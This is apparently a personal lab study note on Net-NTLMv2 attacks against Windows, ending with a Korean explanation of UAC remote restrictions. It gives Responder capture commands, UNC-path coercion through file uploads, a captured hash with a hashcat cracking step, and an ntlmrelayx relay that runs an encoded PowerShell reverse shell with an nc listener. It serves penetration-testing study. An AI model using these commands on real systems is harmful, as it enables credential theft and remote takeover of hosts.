Net-NTLMv2 - wook413

If we've obtained code execution on a remote system, we can easily force it to authenticate with us by commanding it to connect to our prepared SMB server. ```bash \\192.168.45.173\share # assuming responder is listening on that IP ``` If we don't have code execution, we can also use other vectors to force an authentication. For example, when we discover a *file upload* form in a web application on a Windows server, we can try to enter a non-existing file with a **UNC path** like below. If the web application supports uploads via SMB, the Windows server will authenticate to our SMB server. ```bash \\192.168.45.173\share\nonexistent.txt ``` # When we have code execution - example Run [[responder]] as **sudo** to enable permissions needed to handle privileged raw socker operations ```bash sudo responder -I tun0 ``` In remote Windows system, ```powershell dir \\192.168.45.173\test ``` Responder ``` ... [+] Listening for events... [SMB] NTLMv2-SSP Client : ::ffff:192.168.50.211 [SMB] NTLMv2-SSP Username : FILES01\paul [SMB] NTLMv2-SSP Hash : paul::FILES01:1f9d4c51f6e74653:795F138EC69C274D0FD53BB32908A72B:010100000000000000B050CD1777D801B7585DF5719ACFBA0000000002000800360057004D00520001001E00570049004E002D00340044004E004800550058004300340054004900430004003400570049004E002D00340044004E00480055005800430034005400490043002E00360057004D0052002E004C004F00430041004C0003001400360057004D0052002E004C004F00430041004C0005001400360057004D0052002E004C004F00430041004C000700080000B050CD1777D801060004000200000008003000300000000000000000000000002000008BA7AF42BFD51D70090007951B57CB2F5546F7B599BC577CCD13187CFC5EF4790A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E003100310038002E0032000000000000000000 ``` crack hash ```bash hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force ``` # When we do not have code execution but file upload - example ![[Pasted image 20251208205859.png]] ![[Pasted image 20251208210039.png]] ![[Pasted image 20251208210050.png]] --- # Relaying Net-NTLMv2 Let's assume that we obtained the **Net-NTLMv2** hash but couldn't crack it because it was too complex. We can try to use the hash on another machine in what is known as a *relay attack* In this attack, we will again use the *dir* command in the shell to create an SMB connection to our kali. Instead of printing the hash used in the authentication step, we will forward it to the remote host. If `UAC remote restrictions` are enabled on the target then we can only use the *local Administrator* user for the relay attack. - `--no-http-server`: disable the HTTP server since we are relaying an SMB connection - `-smb2support`: add support for SMB2 - `-t`: target - `-c`: set our command, here it's using *base64-encoded PowerShell reverse shell one-liner* ```bash impacket-ntlmrelayx --no-http-server -smb2support -t $IP -c "powershell -enc JABjAGwAaQBlAG4AdA..." ``` ```bash nc -lvnp 4444 ``` ### UAC Remote Restrictions - Windows Vista 이후 적용된 보안 메커니즘 - Local Administrator가 원격으로 접근하면 관리 권한을 빼앗아버리는 것 - 로컬 관리자 계정은 이름만 바꿔도 다 같고 여러 컴퓨터에서 동일한 패스워드를 쓰는 경우가 흔함. 이 경우 공격자가 NTLM 해시나 패스워드를 얻으면 다른 모든 PC에 가볍게 SMB로 접속해서 행정권한을 획득하는 상황이 펼쳐짐. 이를 막기 위해 원격에서 로컬 관리자 그룹 계정이 로그인하면 `제한 토큰`만 부여한다. 즉, 로컬 관리자라고 해도 사실상 일반 사용자 취급하는 것.